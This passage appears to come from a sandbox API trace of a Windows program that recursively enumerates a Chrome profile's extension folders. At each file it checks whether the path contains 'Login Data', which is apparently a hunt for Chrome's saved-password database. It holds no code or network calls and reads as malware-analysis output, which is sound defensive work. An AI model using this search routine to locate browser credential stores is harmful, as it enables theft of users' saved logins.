[0161.582] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.582] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned 137 [0161.582] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned 137 [0161.582] lstrlenW (lpString="\\*.*") returned 4 [0161.582] GetProcessHeap () returned 0x8e0000 [0161.582] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" [0161.582] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*.*" [0161.582] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.582] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.582] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.582] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.582] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.582] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.582] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned 137 [0161.582] lstrlenW (lpString="\\") returned 1 [0161.582] GetProcessHeap () returned 0x8e0000 [0161.582] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no" [0161.582] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\" [0161.582] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\") returned 138 [0161.582] lstrlenW (lpString="messages.json") returned 13 [0161.582] GetProcessHeap () returned 0x8e0000 [0161.582] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\" [0161.582] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" [0161.582] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.582] GetProcessHeap () returned 0x8e0000 [0161.583] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.583] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json", lpSrch="Login Data") returned 0x0 [0161.583] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.583] GetProcessHeap () returned 0x8e0000 [0161.583] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.583] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.583] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.583] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.583] GetProcessHeap () returned 0x8e0000 [0161.583] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.583] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.583] GetProcessHeap () returned 0x8e0000 [0161.583] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.583] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="pl", cAlternateFileName="")) returned 1 [0161.583] lstrcmpiW (lpString1="pl", lpString2=".") returned 1 [0161.583] lstrcmpiW (lpString1="pl", lpString2="..") returned 1 [0161.583] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.583] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.583] lstrlenW (lpString="\\") returned 1 [0161.583] GetProcessHeap () returned 0x8e0000 [0161.583] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.583] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.583] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.583] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.583] lstrlenW (lpString="pl") returned 2 [0161.583] GetProcessHeap () returned 0x8e0000 [0161.583] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.583] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.583] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" [0161.583] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.583] GetProcessHeap () returned 0x8e0000 [0161.583] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.584] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned 137 [0161.584] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned 137 [0161.584] lstrlenW (lpString="\\*.*") returned 4 [0161.584] GetProcessHeap () returned 0x8e0000 [0161.584] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.584] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" [0161.584] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*.*" [0161.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.584] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.584] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.585] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.585] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.585] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.585] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned 137 [0161.585] lstrlenW (lpString="\\") returned 1 [0161.585] GetProcessHeap () returned 0x8e0000 [0161.585] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.585] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl" [0161.585] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\" [0161.585] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\") returned 138 [0161.585] lstrlenW (lpString="messages.json") returned 13 [0161.585] GetProcessHeap () returned 0x8e0000 [0161.585] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.585] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\" [0161.585] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" [0161.585] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.585] GetProcessHeap () returned 0x8e0000 [0161.585] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.585] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.585] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.585] GetProcessHeap () returned 0x8e0000 [0161.585] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.585] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.585] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.585] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.585] GetProcessHeap () returned 0x8e0000 [0161.585] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.585] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.585] GetProcessHeap () returned 0x8e0000 [0161.585] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.585] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0161.585] lstrcmpiW (lpString1="pt_BR", lpString2=".") returned 1 [0161.586] lstrcmpiW (lpString1="pt_BR", lpString2="..") returned 1 [0161.586] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.586] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.586] lstrlenW (lpString="\\") returned 1 [0161.586] GetProcessHeap () returned 0x8e0000 [0161.586] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.586] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.586] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 